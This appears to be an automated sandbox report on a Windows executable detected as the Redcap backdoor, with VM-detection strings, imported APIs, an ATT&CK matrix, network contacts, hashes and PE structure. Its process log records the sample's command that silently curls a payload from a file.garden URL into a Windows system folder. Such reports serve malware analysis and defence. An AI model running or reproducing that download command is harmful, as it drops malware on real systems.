Source: curl.exe, 00000004.00000003.1418861005.000001CBB3453000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: Amcache.hve.0.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.0.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.0.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.0.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.0.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.0.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.0.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.0.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.0.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: recode.exe, 00000000.00000002.3857939559.000001D921FCD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
Source: Amcache.hve.0.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.0.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.0.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\recode.exe

Code function: 0_2_00007FF75805DCA8 memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,

0_2_00007FF75805DCA8

Source: C:\Users\user\Desktop\recode.exe

Code function: 0_2_00007FF75805DCA8 memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,

0_2_00007FF75805DCA8

Source: C:\Users\user\Desktop\recode.exe

Code function: 0_2_00007FF758031B60 QueryPerformanceFrequency,QueryPerformanceCounter,LoadLibraryA,GetProcAddress,GetProcAddress,

0_2_00007FF758031B60

Source: C:\Users\user\Desktop\recode.exe

Code function: 0_2_00007FF75805E9C4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00007FF75805E9C4

Source: C:\Users\user\Desktop\recode.exe

Code function: 0_2_00007FF758048650 powf,powf,powf,sqrtf,sqrtf,sqrt,tanf,tanf,strstr,strstr,DeviceIoControl,mouse_event,mouse_event,GetAsyncKeyState,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,powf,sqrtf,GetAsyncKeyState,SystemParametersInfoW,SystemParametersInfoW,DeviceIoControl,

0_2_00007FF758048650

Source: C:\Users\user\Desktop\recode.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Users\user\Desktop\recode.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior

Source: C:\Users\user\Desktop\recode.exe

Code function: GetLocaleInfoEx,FormatMessageA,

0_2_00007FF75805FAA8

Source: C:\Users\user\Desktop\recode.exe

Code function: 0_2_00007FF75805F900 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF75805F900

Source: Amcache.hve.0.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	1 Masquerading	21 Input Capture	1 System Time Discovery	Remote Services	21 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Process Injection	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
recode.exe	58%	ReversingLabs	Win64.Backdoor.Redcap
recode.exe	63%	Virustotal		Browse
recode.exe	100%	Avira	BDS/Redcap.vfmww
recode.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.josbuivenga.demon.nl	0%	Avira URL Cloud	safe
http://fontello.comCopyright	0%	Avira URL Cloud	safe
http://www.josbuivenga.demon.nlMuseo	0%	Avira URL Cloud	safe
http://www.josbuivenga.demon.nlCopyright	0%	Avira URL Cloud	safe
https://fontawesome.comhttps://fontawesome.comFont	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
file.garden	104.21.16.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.josbuivenga.demon.nlMuseo	recode.exe	false	Avira URL Cloud: safe	unknown
https://fontawesome.com	recode.exe	false		high
https://www.cloudflare.com/learning/access-management/phishing-attack/	curl.exe, 00000004.00000003.1417929801.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417827747.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417996395.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418053562.000001CBB3461000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.4.dr	false		high
http://www.josbuivenga.demon.nl	recode.exe	false	Avira URL Cloud: safe	unknown
http://fontello.comCopyright	recode.exe	false	Avira URL Cloud: safe	unknown
http://fontello.com	recode.exe	false		high
http://www.josbuivenga.demon.nlCopyright	recode.exe	false	Avira URL Cloud: safe	unknown
https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin--outputC:	curl.exe, 00000004.00000002.1422090928.000001CBB3440000.00000004.00000020.00020000.00000000.sdmp	false		high
https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binC	curl.exe, 00000004.00000002.1422212842.000001CBB347A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418751823.000001CBB3479000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418821905.000001CBB347A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.0.dr	false		high
https://fontawesome.comhttps://fontawesome.comFont	recode.exe	false	Avira URL Cloud: safe	unknown
https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binN	curl.exe, 00000004.00000003.1418950817.000001CBB3456000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418861005.000001CBB3453000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1422090928.000001CBB3448000.00000004.00000020.00020000.00000000.sdmp	false		high
https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binn	curl.exe, 00000004.00000002.1422090928.000001CBB3448000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	curl.exe, 00000004.00000003.1417827747.000001CBB34A5000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417929801.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417929801.000001CBB34A5000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417827747.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417996395.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418053562.000001CBB3461000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.4.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.16.1	file.garden	United States		13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590000
Start date and time:	2025-01-13 13:15:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	recode.exe
Detection:	MAL
Classification:	mal76.phis.winEXE@9/2@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.16.1	MACHINE SPECIFICATIONS.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	1001-13.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/utww/
	trow.exe	Get hash	malicious	Unknown	Browse	www.wifi4all.nl/
	8L6MBxaJ2m.exe	Get hash	malicious	FormBook	Browse	www.rafconstrutora.online/0xli/
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	www.kkpmoneysocial.top/86am/
	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
file.garden	HdXeCzyZD9.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	NCTSgL4t0B.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	4tXm5yPtiy.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.97.3
	4sTTCruY06.exe	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	RFQ PC25-1301 Product Specifications_PDF.exe	Get hash	malicious	FormBook	Browse	104.21.80.156
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20link	Get hash	malicious	Unknown	Browse	104.19.132.76
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	https://smartbooking.ma/	Get hash	malicious	Unknown	Browse	188.114.97.3
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	https://connexion-pro.support/adobe/s/assets/	Get hash	malicious	Unknown	Browse	104.21.11.138
	rRef6010273.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	gem2.exe	Get hash	malicious	Unknown	Browse	104.21.16.1
	gem1.exe	Get hash	malicious	Unknown	Browse	104.21.16.1
	tiko-ifyzit-srdh.vbs	Get hash	malicious	Unknown	Browse	104.21.16.1
	Jx6bD8nM4qW9sL3v.exe	Get hash	malicious	Unknown	Browse	104.21.16.1
	dsoft.exe	Get hash	malicious	Python Stealer, Creal Stealer	Browse	104.21.16.1
	Canvas of Kings_N6xC-S2.exe	Get hash	malicious	Unknown	Browse	104.21.16.1
	Violated Heroine_91zbZ-1.exe	Get hash	malicious	Unknown	Browse	104.21.16.1
	58VSNPxrI4.exe	Get hash	malicious	Unknown	Browse	104.21.16.1
	676556be12ac3.vbs	Get hash	malicious	Mint Stealer	Browse	104.21.16.1
	PKO_0019289289544_PDF_#U2463#U2466#U2465#U2462#U2461#U2466#U2464#U2462.hta	Get hash	malicious	Mint Stealer	Browse	104.21.16.1

Process:	C:\Windows\System32\curl.exe
File Type:	HTML document, ASCII text, with very long lines (394)
Category:	dropped
Size (bytes):	4571
Entropy (8bit):	5.054919966848219
Encrypted:	false
SSDEEP:	96:1j9jwIjYjUDK/D5DMF+BOiUAtEZLmmmrR89PaQxJbGD:1j9jhjYjIK/Vo+trEZ6mmre9ieJGD
MD5:	65472652D391E54A8DF8C71B6D3D6BD4
SHA1:	282128F61E7C070AAA7C4804A3A41177F31CC30D
SHA-256:	C44D35E38FA3DA9596786F900CC3DAAA2B6653BE475AFF92C4946163965BA6E8
SHA-512:	7D829D309D248B30747F7E7C4EC5111A91D3F40DEF7D7B9746ED5CD56A6AA305D0A30886AFE51F3B975CED777C5991552E213820DD54FAC10F3D29A20B912249
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlockedWebSite, Description: Yara detected BlockedWebSite, Source: C:\Windows\Speech\physmeme.exe, Author: Joe Security
Reputation:	low
Preview:	<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site \| Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]-->.<style>body{margin:0;padding:0}</style>... [if gte IE 10]> >.<script>. if (!navigator.cookieEnabled) {. window.addEventListener('DOMContentLoaded

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\Desktop\recode.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.369393853418397
Encrypted:	false
SSDEEP:	6144:AFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNliL:YV1QyWWI/glMM6kF7/q
MD5:	AF6790CFE636257DBE25FA583DAAE80D
SHA1:	0AF988263CF2D9E70C347B2E51DA9CD8A9839091
SHA-256:	C800B345010953840F801D53A3A26A70ECA1CDB312C0BDE606B034D3CBF0C8CC
SHA-512:	9864969F41992DE2ED1E49CB74C397DCC4997C143FA6B88B1E7BD94B68ED07616FA4E177FC9A12BF58A3BEBD2BCE6043C5F57F70CA574DD8357772D65FDC0862
Malicious:	false
Reputation:	low
Preview:	regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....e..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.995363521249757
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	recode.exe
File size:	890'368 bytes
MD5:	0023578e24d6ed38daf9c364137a8929
SHA1:	8f99599b5ee81e2b2401a3ef7eb17026780a1bd9
SHA256:	ff717b5311c7d23838e0f7c9f06d8967b43626dfcababc329386851e6e6d9cb3
SHA512:	80536311b27688e9d86319d876ac2c04d446492dc56a7f74599075818f3ebb845558dd7141813eb8c9b06eb89a948cbba17b68fde1dfad29dd3716573cfd22c2
SSDEEP:	12288:TFSfPUBEpY8XzBBFKzNAdDrnQUxCj2AqeMQm96TnSEl1yt6zzng0LKFdym2jO+AB:TFsPc41vKz2rnQuGKFGRop
TLSH:	A115C08EB1AF49E9D062E17D5AD67213F671390817102BE3BBC4445C37E76D86AF8E02
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v...v...v....\|..v.......v.......v.......v.......v.......v.......v.......v.......v...v...w.......v.......v.......v..Rich.v.

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14005e9b0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66E890FC [Mon Sep 16 20:11:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	b4739d47e366c5fdac6bcebcee22b298

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F5824EDA4CCh
dec eax
add esp, 28h
jmp 00007F5824ED93F7h
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
xor ecx, ecx
call dword ptr [00003753h]
dec eax
mov ecx, ebx
call dword ptr [00003742h]
call dword ptr [0000374Ch]
dec eax
mov ecx, eax
mov edx, C0000409h
dec eax
add esp, 20h
pop ebx
dec eax
jmp dword ptr [00003740h]
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 38h
mov ecx, 00000017h
call dword ptr [00003734h]
test eax, eax
je 00007F5824ED9589h
mov ecx, 00000002h
int 29h
dec eax
lea ecx, dword ptr [000791D2h]
call 00007F5824ED962Eh
dec eax
mov eax, dword ptr [esp+38h]
dec eax
mov dword ptr [000792B9h], eax
dec eax
lea eax, dword ptr [esp+38h]
dec eax
add eax, 08h
dec eax
mov dword ptr [00079249h], eax
dec eax
mov eax, dword ptr [000792A2h]
dec eax
mov dword ptr [00079113h], eax
dec eax
mov eax, dword ptr [esp+40h]
dec eax
mov dword ptr [00079217h], eax
mov dword ptr [000790EDh], C0000409h
mov dword ptr [000790E7h], 00000001h
mov dword ptr [000790F1h], 00000001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc0f60	0x190	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xde000	0x1e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xd9000	0x39c0	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xdf000	0x350	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xba4b0	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xba580	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xba370	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x62000	0x5d8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6016f	0x60200	c7b0126e28080e37732361bc1b3147ad	False	0.48006999756176855	data	6.536362421256434	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x62000	0x60434	0x60600	839e369b65d550a7c64e03af8369a968	False	0.6223679677367056	data	6.716633658693276	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc3000	0x15100	0x14800	44746906914cb52981b2b71c1e495bb0	False	0.5246403391768293	data	7.013222736385388	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0xd9000	0x39c0	0x3a00	628f7c8bd6967fea3ae3b8e6c24ca0b4	False	0.4816810344827586	data	5.788334614762561	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0xdd000	0x1d0	0x200	90c1a4c095bdcd0bd7c466f09ff97faa	False	0.37890625	data	4.523192804901079	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xde000	0x1e8	0x200	babcd7d58124e853f8251c367ae2737c	False	0.54296875	data	4.762595083624659	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xdf000	0x350	0x400	4b5efc1c841dec2c8131657213df732f	False	0.482421875	data	4.755177466104086	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xde060	0x188	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5892857142857143

Imports

DLL	Import
d3d11.dll	D3D11CreateDeviceAndSwapChain
dwmapi.dll	DwmExtendFrameIntoClientArea
ntdll.dll	RtlLookupFunctionEntry, RtlVirtualUnwind, RtlCaptureContext
KERNEL32.dll	GlobalLock, GlobalFree, MultiByteToWideChar, WideCharToMultiByte, QueryPerformanceCounter, QueryPerformanceFrequency, FreeLibrary, GetProcAddress, LoadLibraryA, CreateFileA, CreateFileW, CloseHandle, GetLastError, DeviceIoControl, InitializeCriticalSectionEx, DeleteCriticalSection, CreateEventW, CreateThread, lstrcmpiA, GetConsoleWindow, CreateToolhelp32Snapshot, Process32First, Process32Next, IsDebuggerPresent, OutputDebugStringW, ReleaseSRWLockExclusive, GlobalAlloc, WakeAllConditionVariable, SleepConditionVariableSRW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, Sleep, LocalFree, FormatMessageA, GetLocaleInfoEx, FindClose, FindFirstFileW, GetFileAttributesExW, AreFileApisANSI, GlobalUnlock, GetFileInformationByHandleEx, AcquireSRWLockExclusive
USER32.dll	SetClipboardData, GetClipboardData, EmptyClipboard, CloseClipboard, OpenClipboard, GetKeyState, GetForegroundWindow, SystemParametersInfoW, GetWindowLongA, MessageBoxA, GetSystemMetrics, mouse_event, GetAsyncKeyState, DestroyWindow, DispatchMessageA, LoadCursorA, ScreenToClient, ClientToScreen, GetCursorPos, SetCursor, SetCursorPos, GetClientRect
IMM32.dll	ImmSetCandidateWindow, ImmReleaseContext, ImmSetCompositionWindow, ImmGetContext
D3DCOMPILER_47.dll	D3DCompile
MSVCP140.dll	?_Throw_Cpp_error@std@@YAXH@Z, ?_Winerror_map@std@@YAHH@Z, ?_Syserror_map@std@@YAPEBDH@Z, _Thrd_detach, _Query_perf_counter, ?_Xlength_error@std@@YAXPEBD@Z, _Query_perf_frequency
VCRUNTIME140.dll	__std_terminate, strstr, memchr, __current_exception_context, __current_exception, __C_specific_handler, wcsstr, _CxxThrowException, __std_exception_destroy, __std_exception_copy, memcmp, memset, memmove, memcpy
VCRUNTIME140_1.dll	__CxxFrameHandler4
api-ms-win-crt-string-l1-1-0.dll	strncpy, strncmp, strcmp
api-ms-win-crt-stdio-l1-1-0.dll	__acrt_iob_func, fflush, __stdio_common_vsnprintf_s, __stdio_common_vsprintf_s, fread, fseek, __p__commode, ftell, _wfopen, _set_fmode, __stdio_common_vsscanf, __stdio_common_vsprintf, __stdio_common_vfprintf, fwrite, fclose
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, free, malloc, _callnewh
api-ms-win-crt-utility-l1-1-0.dll	qsort
api-ms-win-crt-math-l1-1-0.dll	log, logf, pow, powf, asin, atan2, sqrt, sinf, __setusermatherr, cosf, ceilf, acosf, sqrtf, fmodf, tanf
api-ms-win-crt-runtime-l1-1-0.dll	__p___argv, _c_exit, _register_thread_local_exe_atexit_callback, system, _exit, _invalid_parameter_noinfo_noreturn, exit, abort, _initterm_e, __p___argc, _configure_narrow_argv, _initterm, _get_initial_narrow_environment, _set_app_type, _seh_filter_exe, _cexit, _initialize_narrow_environment, _initialize_onexit_table, _register_onexit_function, _beginthreadex, terminate, _crt_atexit
